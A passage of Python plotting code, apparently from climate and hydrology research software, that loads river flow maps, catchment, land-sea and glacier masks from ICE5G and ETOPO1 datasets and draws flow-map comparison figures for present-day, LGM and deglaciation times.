"catchmentmap_unsorted_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_directly_upscaled),
data_original_scale_flow_map_filename=\
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_{0}.nc".\
format(data_creation_datetime_directly_upscaled),
swap_ref_and_data_when_finding_labels=True,
catchment_and_outflows_mods_list_filename=\
"catch_and_outflow_mods_ice5g_10min_directly_upscaled_rdirs_vs_indirectly_upscaled_data.txt",
matching_parameter_set='area',
grid_type='HD',data_original_scale_grid_type='LatLong10min')
class FlowMapPlots(Plots):
"""A general base class for flow maps"""
flow_maps_path_extension = 'flowmaps'
ls_masks_extension = 'lsmasks'
hdpara_extension = 'hdfiles'
orography_extension = 'orographys'
catchments_extension = 'catchmentmaps'
def __init__(self,save,color_palette_to_use='default'):
"""Class Constructor"""
super(FlowMapPlots,self).__init__(save,color_palette_to_use)
self.flow_maps_data_directory = os.path.join(self.hd_data_path,self.flow_maps_path_extension)
self.ls_masks_data_directory= os.path.join(self.hd_data_path,self.ls_masks_extension)
self.hdpara_directory = os.path.join(self.hd_data_path,self.hdpara_extension)
self.orography_directory = os.path.join(self.hd_data_path,self.orography_extension)
self.catchments_directory = os.path.join(self.hd_data_path,self.catchments_extension)
def FourFlowMapSectionsFromDeglaciation(self,time_one=14000,time_two=13600,time_three=12700,time_four=12660):
""" """
flowmap_one_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171a_{}.nc".format(time_one))
flowmap_two_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_two))
flowmap_three_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_three))
flowmap_four_filename = os.path.join(self.flow_maps_data_directory,
"30min_flowtocell_pmu0171b_{}.nc".format(time_four))
catchments_one_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171a_{}.nc".format(time_one))
catchments_two_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_two))
catchments_three_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_three))
catchments_four_filename = os.path.join(self.catchments_directory,
"30min_catchments_pmu0171b_{}.nc".format(time_four))
lsmask_one_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_one))
lsmask_two_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_two))
lsmask_three_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_three))
lsmask_four_filename = os.path.join(self.hdpara_directory,
"hdpara_{}k.nc".format(time_four))
glac_mask_one_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_one))
glac_mask_two_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_two))
glac_mask_three_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_three))
glac_mask_four_filename = os.path.join(self.orography_directory,
"glac01_{}.nc".format(time_four))
flowmap_one = iodriver.load_field(flowmap_one_filename,
file_type=iodriver.get_file_extension(flowmap_one_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_one = iodriver.load_field(lsmask_one_filename,
file_type=iodriver.get_file_extension(lsmask_one_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_one = iodriver.load_field(glac_mask_one_filename,
file_type=iodriver.get_file_extension(glac_mask_one_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_one = utilities.upscale_field(glac_mask_one,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_one.flip_data_ud()
glac_mask_hd_one.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_one = glac_mask_hd_one.get_data()
catchments_one = iodriver.load_field(catchments_one_filename,
file_type=iodriver.get_file_extension(catchments_one_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_two = iodriver.load_field(flowmap_two_filename,
file_type=iodriver.get_file_extension(flowmap_two_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_two = iodriver.load_field(lsmask_two_filename,
file_type=iodriver.get_file_extension(lsmask_two_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_two = iodriver.load_field(glac_mask_two_filename,
file_type=iodriver.get_file_extension(glac_mask_two_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_two = utilities.upscale_field(glac_mask_two,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_two.flip_data_ud()
glac_mask_hd_two.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_two = glac_mask_hd_two.get_data()
catchments_two = iodriver.load_field(catchments_two_filename,
file_type=iodriver.get_file_extension(catchments_two_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_three = iodriver.load_field(flowmap_three_filename,
file_type=iodriver.get_file_extension(flowmap_three_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_three = iodriver.load_field(lsmask_three_filename,
file_type=iodriver.get_file_extension(lsmask_three_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_three = iodriver.load_field(glac_mask_three_filename,
file_type=iodriver.get_file_extension(glac_mask_three_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_three = utilities.upscale_field(glac_mask_three,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
glac_mask_hd_three.flip_data_ud()
glac_mask_hd_three.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_three = glac_mask_hd_three.get_data()
catchments_three = iodriver.load_field(catchments_three_filename,
file_type=iodriver.get_file_extension(catchments_three_filename),
field_type='Generic',
grid_type='HD').get_data()
flowmap_four = iodriver.load_field(flowmap_four_filename,
file_type=iodriver.get_file_extension(flowmap_four_filename),
field_type='Generic',
grid_type='HD').get_data()
lsmask_four = iodriver.load_field(lsmask_four_filename,
file_type=iodriver.get_file_extension(lsmask_four_filename),
field_type='Generic',
fieldname='FLAG',
grid_type='HD').get_data().astype(np.int32)
glac_mask_four = iodriver.load_field(glac_mask_four_filename,
file_type=iodriver.get_file_extension(glac_mask_four_filename),
field_type='Generic',
fieldname='glac',
grid_type='LatLong10min')
glac_mask_hd_four = utilities.upscale_field(glac_mask_four,"HD",'Sum',
output_grid_kwargs={},
scalenumbers=True)
catchments_four = iodriver.load_field(catchments_four_filename,
file_type=iodriver.get_file_extension(catchments_four_filename),
field_type='Generic',
grid_type='HD').get_data()
glac_mask_hd_four.flip_data_ud()
glac_mask_hd_four.rotate_field_by_a_hundred_and_eighty_degrees()
glac_mask_hd_four = glac_mask_hd_four.get_data()
bounds=[0,150,60,265]
fig = plt.figure(figsize=(14,10))
gs = gridspec.GridSpec(2,3,width_ratios=[4,4,1])
ax1 = plt.subplot(gs[0,0])
ax2 = plt.subplot(gs[0,1])
ax3 = plt.subplot(gs[1,0])
ax4 = plt.subplot(gs[1,1])
cax = plt.subplot(gs[:,2])
rc_pts.simple_thresholded_data_only_flowmap(ax1,flowmap_one,lsmask_one,threshold=75,
glacier_mask=glac_mask_hd_one,
catchments=catchments_one,
catchnumone=4,
catchnumtwo=30,
catchnumthree=20,
bounds=bounds,
cax = cax,
colors=self.colors)
ax1.set_title("{} BP".format(time_one))
rc_pts.simple_thresholded_data_only_flowmap(ax2,flowmap_two,lsmask_two,threshold=75,
glacier_mask=glac_mask_hd_two,
catchments=catchments_two,
catchnumone=4,
catchnumtwo=30,
catchnumthree=51,
bounds=bounds,
colors=self.colors)
ax2.set_title("{} BP".format(time_two))
rc_pts.simple_thresholded_data_only_flowmap(ax3,flowmap_three,lsmask_three,threshold=75,
glacier_mask=glac_mask_hd_three,
catchments=catchments_three,
catchnumone=3,
catchnumtwo=21,
catchnumthree=8,
bounds=bounds,
colors=self.colors)
ax3.set_title("{} BP".format(time_three))
rc_pts.simple_thresholded_data_only_flowmap(ax4,flowmap_four,lsmask_four,threshold=75,
glacier_mask=glac_mask_hd_four,
catchments=catchments_four,
catchnumone=11,
catchnumtwo=7,
catchnumthree=8,
bounds=bounds,
colors=self.colors)
ax4.set_title("{} BP".format(time_four))
gs.tight_layout(fig,rect=(0,0.1,1,1))
def SimpleFlowMapPlotHelper(self,filename,grid_type,log_max=4):
"""Help produce simple flow maps"""
flowmap_object = iodriver.load_field(filename,
file_type=iodriver.get_file_extension(filename),
field_type='Generic',
grid_type=grid_type)
flowmap = flowmap_object.get_data()
plt.figure()
plt.subplot(111)
if log_max == 0:
log_max = math.log(np.amax(flowmap))
levels = np.logspace(0,log_max,num=50)
#ctrs = plt.contourf(flowmap,levels=levels,norm=colors.LogNorm())
#plt.contourf(flowmap,levels=levels,norm=colors.LogNorm())
plt.contourf(flowmap,levels=levels)
#cbar = plt.colorbar(ctrs)
cbar = plt.colorbar()
cbar.ax.set_ylabel('Number of cells flowing to cell')
pts.remove_ticks()
if self.save:
#plt.savefig('')
pass
def FlowMapTwoColourComparisonHelper(self,ref_filename,data_filename,lsmask_filename=None,
grid_type='HD',minflowcutoff=100,flip_data=False,
rotate_data=False,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=True,
invert_ls_mask=False,
first_datasource_name="Reference",
second_datasource_name="Data",
add_title=True,**kwargs):
"""Help compare two two-colour flow maps"""
flowmap_ref_field = iodriver.load_field(ref_filename,
file_type=iodriver.get_file_extension(ref_filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
flowmap_data_field = iodriver.load_field(data_filename,
file_type=iodriver.get_file_extension(data_filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
if lsmask_filename:
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**kwargs)
if flip_data:
flowmap_data_field.flip_data_ud()
if rotate_data:
flowmap_data_field.rotate_field_by_a_hundred_and_eighty_degrees()
if flip_ref:
flowmap_ref_field.flip_data_ud()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.flip_data_ud()
if rotate_ref:
flowmap_ref_field.rotate_field_by_a_hundred_and_eighty_degrees()
if lsmask_filename and lsmask_has_same_orientation_as_ref:
lsmask_field.rotate_field_by_a_hundred_and_eighty_degrees()
if invert_ls_mask:
lsmask_field.invert_data()
if lsmask_filename:
lsmask = lsmask_field.get_data()
flowmap_ref_field = flowmap_ref_field.get_data()
flowmap_data_field = flowmap_data_field.get_data()
plt.figure(figsize=(20,8))
ax = plt.subplot(111)
fmp_pts.make_basic_flowmap_comparison_plot(ax,flowmap_ref_field,flowmap_data_field,minflowcutoff,
first_datasource_name,second_datasource_name,lsmask,
colors=self.colors,add_title=add_title)
def FlowMapTwoColourPlotHelper(self,filename,lsmask_filename=None,grid_type='HD',
minflowcutoff=100,flip_data=False,flip_mask=False,
**kwargs):
"""Help produce two colour flow maps"""
flowmap_object = iodriver.load_field(filename,
file_type=iodriver.get_file_extension(filename),
field_type='Generic',
grid_type=grid_type,**kwargs)
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**kwargs)
if flip_data:
flowmap_object.flip_data_ud()
if flip_mask:
lsmask_field.flip_data_ud()
lsmask = lsmask_field.get_data()
flowmap = flowmap_object.get_data()
plt.figure()
plt.subplot(111)
flowmap[flowmap < minflowcutoff] = 1
flowmap[flowmap >= minflowcutoff] = 2
if lsmask is not None:
flowmap[lsmask == 1] = 0
cmap = mpl.colors.ListedColormap(['blue','peru','black'])
bounds = list(range(4))
norm = mpl.colors.BoundaryNorm(bounds,cmap.N)
plt.imshow(flowmap,cmap=cmap,norm=norm,interpolation="none")
plt.title('Cells with cumulative flow greater than or equal to {0}'.format(minflowcutoff))
def Etopo1FlowMap(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_etopo1_data_ALG4_sinkless_20160603_114215.nc')
self.SimpleFlowMapPlotHelper(filename,'LatLong1min')
def Etopo1FlowMap_two_colour(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_etopo1_data_ALG4_sinkless_20160603_112520.nc')
lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
'ls_mask_etopo1_data_ALG4_sinkless_20160603_112520.nc')
self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
grid_type='LatLong1min',
minflowcutoff=25000,flip_data=True,flip_mask=True)
def Etopo1FlowMap_two_colour_directly_upscaled_fields(self):
filename=os.path.join(self.flow_maps_data_directory,'upscaled',
'flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows'
'_and_river_mouth_flows_20160603_114215.nc')
lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
'ls_mask_extract_ls_mask_from_corrected_'
'HD_rdirs_20160504_142435.nc')
self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=50,flip_data=True,flip_mask=False)
def Corrected_HD_Rdirs_FlowMap_two_colour(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
'ls_mask_extract_ls_mask_from_corrected_'
'HD_rdirs_20160504_142435.nc')
self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=25,flip_data=False,flip_mask=False)
def Corrected_HD_Rdirs_And_Etopo1_ALG4_sinkless_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
'flowmap_etopo1_data_ALG4_sinkless_upscale_riverflows'
'_and_river_mouth_flows_20160503_231022.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True)
def Corrected_HD_Rdirs_And_Etopo1_ALG4_true_sinks_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
'flowmap__etopo1_data_ALG4_sinkless_upscale_riverflows'
'_and_river_mouth_flows_20160603_114215.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=50,
flip_data=True)
def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_sinkless_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap_ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160502_163323.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True,
rotate_data=True)
def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap__ICE5G_data_ALG4_sinkless_0k_upscale_riverflows"
"_and_river_mouth_flows_20160603_112520.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True,
rotate_data=True)
def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap_ICE5G_data_ALG4_sinkless_0k_20160802_112138.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True,
rotate_data=True)
def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_20160919_090154.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True,
rotate_data=True)
def Corrected_HD_Rdirs_And_ICE5G_data_ALG4_no_true_sinks_corr_orog_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap_ICE5G_data_ALG4_sinkless_no_true_sinks_0k_20160718_114758.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=True,
rotate_data=True)
def Corrected_HD_Rdirs_And_ICE5G_HD_as_data_ALG4_true_sinks_0k_directly_upscaled_fields_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE5G_as_HD_data_ALG4_sinkless_all_points_0k_20160608_184931.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=75,
flip_data=False,
rotate_data=False)
def Upscaled_Rdirs_vs_Directly_Upscaled_fields_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc')
data_filename=os.path.join(self.flow_maps_data_directory,'upscaled',
"flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_20160930_001057.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=50,
flip_data=True,
rotate_data=True,
flip_ref=True,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False)
def Upscaled_Rdirs_vs_Corrected_HD_Rdirs_ICE5G_data_ALG4_corr_orog_downscaled_ls_mask_0k_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_corrected_HD_rdirs_post_processing_20160427_141158.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_downscaled_ls_mask_0k_upscale_rdirs_20161031_113238_updated.nc')
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_extract_ls_mask_from_corrected_"
"HD_rdirs_20160504_142435.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=60,
flip_data=True,
rotate_data=True,
flip_ref=False,
rotate_ref=False,
lsmask_has_same_orientation_as_ref=False)
def ICE5G_data_ALG4_true_sinks_21k_And_ICE5G_data_ALG4_true_sinks_0k_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_connected_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='LatLong10min',
minflowcutoff=75,
flip_data=True,
rotate_data=True,
flip_ref=True,
rotate_ref=True)
def ICE5G_data_all_points_0k_alg4_two_colour(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc')
lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
'ls_mask_ICE5G_data_ALG4_sinkless_0k_20160603_112512.nc')
self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
grid_type='LatLong10min',
minflowcutoff=250,flip_data=True,
flip_mask=True)
def ICE5G_data_all_points_21k_alg4_two_colour(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
lsmask_filename = os.path.join(self.ls_masks_data_directory,'generated',
'ls_mask_ICE5G_data_ALG4_sinkless_21k_20160603_132009.nc')
self.FlowMapTwoColourPlotHelper(filename,lsmask_filename=lsmask_filename,
grid_type='LatLong10min',
minflowcutoff=250,flip_data=True,
flip_mask=True)
def ICE5G_data_all_points_0k_alg4(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_ALG4_sinkless_0k_20160603_112520.nc')
self.SimpleFlowMapPlotHelper(filename,'LatLong10min')
def ICE5G_data_all_points_0k_no_sink_filling(self):
filename=os.path.join(self.flow_maps_data_directory,
'flowmap_ICE5G_data_all_points_0k_20160229_133433.nc')
self.SimpleFlowMapPlotHelper(filename,'LatLong10min',log_max=3.0)
def Ten_Minute_Data_from_Virna_data_ALG4_corr_orog_downscaled_lsmask_no_sinks_21k_vs_0k_FlowMap_comparison(self):
ref_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_0k_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170123"
"_165707_upscaled_updated.nc")
data_filename=os.path.join(self.flow_maps_data_directory,
"flowmap_ten_minute_data_from_virna_lgm_ALG4_sinkless"
"_no_true_sinks_oceans_lsmask_plus_upscale_rdirs_20170127"
"_163957_upscaled_updated.nc")
lsmask_filename=os.path.join(self.ls_masks_data_directory,"generated",
"ls_mask_ten_minute_data_from_virna_lgm_"
"ALG4_sinkless_no_true_sinks_oceans_lsmask"
"_plus_upscale_rdirs_20170127_163957_HD_transf.nc")
self.FlowMapTwoColourComparisonHelper(ref_filename=ref_filename,
data_filename=data_filename,
lsmask_filename=lsmask_filename,
grid_type='HD',
minflowcutoff=35,
flip_data=False,
rotate_data=True,
flip_ref=False,
rotate_ref=True,
lsmask_has_same_orientation_as_ref=False,
invert_ls_mask=True,
first_datasource_name="Present day",
second_datasource_name="LGM")
class FlowMapPlotsWithCatchments(FlowMapPlots):
"""Flow map plots with selected catchments areas overlaid"""
catchments_path_extension = 'catchmentmaps'
rdirs_path_extension = 'rdirs'
rmouth_outflow_path_extension = 'rmouthflow'
catchment_and_outflows_mods_list_extension = 'catchmods'
additional_matches_list_extension = 'addmatches'
additional_truesink_matches_list_extension = 'addmatches_truesinks'
orog_path_extension = 'orographys'
def __init__(self,save,color_palette_to_use='default'):
"""Class constructor"""
super(FlowMapPlotsWithCatchments,self).__init__(save,color_palette_to_use)
self.catchments_data_directory = os.path.join(self.hd_data_path,self.catchments_path_extension)
self.rdirs_data_directory = os.path.join(self.hd_data_path,self.rdirs_path_extension)
self.rmouth_outflow_data_directory = os.path.join(self.hd_data_path,self.rmouth_outflow_path_extension)
self.temp_label = 'temp_' + datetime.datetime.now().strftime("%Y%m%d_%H%M%S%f") + "_"
self.additional_matches_list_directory = os.path.join(self.hd_data_path,
self.additional_matches_list_extension)
self.additional_truesink_matches_list_directory = os.path.join(self.additional_matches_list_directory,
self.additional_truesink_matches_list_extension)
self.catchment_and_outflows_mods_list_directory = os.path.join(self.hd_data_path,
self.catchment_and_outflows_mods_list_extension)
self.orog_data_directory = os.path.join(self.hd_data_path,self.orog_path_extension)
def FlowMapTwoColourComparisonWithCatchmentsHelper(self,ref_flowmap_filename,data_flowmap_filename,
ref_catchment_filename,data_catchment_filename,
ref_rdirs_filename,data_rdirs_filename,
reference_rmouth_outflows_filename,
data_rmouth_outflows_filename,
lsmask_filename=None,minflowcutoff=100,flip_data=False,
rotate_data=False,flip_ref=False,rotate_ref=False,
lsmask_has_same_orientation_as_ref=True,
flip_lsmask=False,rotate_lsmask=False,
invert_ls_mask=False,matching_parameter_set='default',
rivers_to_plot=None,
rivers_to_plot_alt_color=None,
rivers_to_plot_secondary_alt_color=None,
use_single_color_for_discrepancies=True,
use_only_one_color_for_flowmap=False,
additional_matches_list_filename=None,
additional_truesink_matches_list_filename=None,
catchment_and_outflows_mods_list_filename=None,
first_datasource_name="Reference",
second_datasource_name="Data",use_title=True,
remove_antartica=False,
difference_in_catchment_label="Discrepancy",
glacier_mask_filename=None,
extra_lsmask_filename=None,
fig_size=(12,5),
grid_type='HD',
glacier_mask_grid_type='LatLong10min',
glacier_mask_grid_kwargs={},
flip_glacier_mask=False,
rotate_glacier_mask=False,
**grid_kwargs):
"""Help compare two two-colour flow maps"""
if (rivers_to_plot_secondary_alt_color is not None):
if (rivers_to_plot is None) or (rivers_to_plot_alt_color is None):
raise RuntimeError("Invalid options - Secondary alternative color set when primary and/or"
"secondary colors unused")
else:
rivers_to_plot_alt_color.extend(rivers_to_plot_secondary_alt_color)
else:
rivers_to_plot_secondary_alt_color = []
flowmap_grid=grid.makeGrid(grid_type)
ref_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,ref_flowmap_filename)
data_flowmaps_filepath = os.path.join(self.flow_maps_data_directory,data_flowmap_filename)
ref_catchment_filepath = os.path.join(self.catchments_data_directory,
ref_catchment_filename)
data_catchment_filepath = os.path.join(self.catchments_data_directory,
data_catchment_filename)
flowmap_ref_field = iodriver.load_field(ref_flowmaps_filepath,
file_type=iodriver.get_file_extension(ref_flowmaps_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
flowmap_data_field = iodriver.load_field(data_flowmaps_filepath,
file_type=iodriver.get_file_extension(data_flowmaps_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
data_catchment_field = iodriver.load_field(data_catchment_filepath,
file_type=iodriver.get_file_extension(data_catchment_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
ref_catchment_field = iodriver.load_field(ref_catchment_filepath,
file_type=iodriver.get_file_extension(ref_catchment_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if data_rdirs_filename:
data_rdirs_filepath = os.path.join(self.rdirs_data_directory,
data_rdirs_filename)
ref_rdirs_filepath = os.path.join(self.rdirs_data_directory,ref_rdirs_filename)
if data_rdirs_filename:
data_rdirs_field = iodriver.load_field(data_rdirs_filepath,
file_type=iodriver.get_file_extension(data_rdirs_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
else:
data_rdirs_field = None
ref_rdirs_field = iodriver.load_field(ref_rdirs_filepath,
file_type=iodriver.get_file_extension(ref_rdirs_filepath),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if lsmask_filename:
lsmask_field = iodriver.load_field(lsmask_filename,
file_type=iodriver.get_file_extension(lsmask_filename),
field_type='Generic', grid_type=grid_type,**grid_kwargs)
if extra_lsmask_filename:
extra_lsmask_field = iodriver.load_field(extra_lsmask_filename,
file_type=iodriver.
get_file_extension(extra_lsmask_filename),
field_type='Generic',
grid_type=grid_type,**grid_kwargs)
if catchment_and_outflows_mods_list_filename:
catchment_and_outflows_mods_list_filepath = os.path.join(self.catchment_and_outflows_mods_list_directory,
catchment_and_outflows_mods_list_filename)
if additional_matches_list_filename:
additional_matches_list_filepath = os.path.join(self.additional_matches_list_directory,
additional_matches_list_filename)
if additional_truesink_matches_list_filename:
